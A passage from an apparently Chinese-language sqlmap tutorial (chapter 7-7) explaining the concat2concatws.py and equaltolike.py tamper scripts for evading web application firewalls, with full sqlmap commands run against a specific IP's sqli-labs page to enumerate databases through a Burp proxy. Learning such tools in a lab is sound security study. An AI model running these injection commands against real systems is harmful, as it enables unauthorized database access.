14. concat2concatws.py脚本

表示使用concat_ws(mid(char(0),0,0),A,D) 替换为concat(A,D),只适用于mysql

实战演示:

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="concat2concatws.py" --proxy="http://127.0.0.1:8080" -batch

sqlmap从入门到精通-第七章-7-7 绕过WAF脚本-concat2concatws.py&equaltolike.py_sql

sqlmap从入门到精通-第七章-7-7 绕过WAF脚本-concat2concatws.py&equaltolike.py_python_02

 发现是可以注入的,使用burp查看抓包的信息,发现并未看到很好的效果

sqlmap从入门到精通-第七章-7-7 绕过WAF脚本-concat2concatws.py&equaltolike.py_python_03

sqlmap从入门到精通-第七章-7-7 绕过WAF脚本-concat2concatws.py&equaltolike.py_抓包_04

 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

15. equaltolike.py脚本

通过使用like这个运算符替换所有的等于号"=" 适用于所有的数据库

实战演示:

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="equaltolike.py" --proxy="http://127.0.0.1:8080" -batch

sqlmap从入门到精通-第七章-7-7 绕过WAF脚本-concat2concatws.py&equaltolike.py_python_05

sqlmap从入门到精通-第七章-7-7 绕过WAF脚本-concat2concatws.py&equaltolike.py_python_06

 达到效果,可以正常注入,我们查看下burp的抓包数据

sqlmap从入门到精通-第七章-7-7 绕过WAF脚本-concat2concatws.py&equaltolike.py_抓包_07

sqlmap从入门到精通-第七章-7-7 绕过WAF脚本-concat2concatws.py&equaltolike.py_python_08

迷茫的人生,需要不断努力,才能看清远方模糊的志向!